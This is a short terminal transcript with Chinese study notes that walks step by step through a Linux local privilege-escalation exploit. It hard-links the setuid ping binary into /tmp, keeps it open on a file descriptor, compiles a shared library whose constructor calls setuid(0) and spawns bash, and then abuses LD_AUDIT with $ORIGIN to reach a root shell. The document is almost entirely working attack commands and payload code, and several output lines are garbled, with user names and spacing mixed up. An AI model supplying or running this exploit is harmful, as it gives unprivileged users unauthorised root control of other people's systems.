以一个普通用户MI登录
[MI@localhost tmp]$ ls -ld /tmp/ 因为tmp目录能写文件!!
drwxrwxrwt 11 root root 4096 10-14 21:29 /tmp/
[MI@localhost tmp]$ cd /tmp/
[MI@localhost tmp]$ mkdir exploit
[MI@localhost tmp]$ ln /bin/ping /tmp/exploit/target
[MI@localhost tmp]$ exec 3< /tmp/exploit/target 文件描述符,把/tmp/exploit/target定义为文件描述符3
[MI@localhost tmp]$ ls -l /proc/
/fd/3lr−x−−−−−−1hellohello6410−2009:30/proc/10990/fd/3−>/tmp/exploit/target
[hello@localhosttmp]$rm−fr/tmp/exploit/
[hello@localhosttmp]$ ls−l/proc/
/fd/3
lr-x------ 1 hello hello 64 10-20 09:30 /proc/10990/fd/3 -> /tmp/exploit/target (deleted)
[MI@localhost tmp]$ cat > payload.c 必须要把c学的很明白!!
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
[MI@localhost tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[MI@localhost tmp]$ ls -l /tmp/exploit
-rwxrwxr-x 1 hello hello 4223 10-20 09:32 /tmp/exploit
[MI@localhost tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 定义环境变量
[root@localhost tmp]# whoami
root
--------------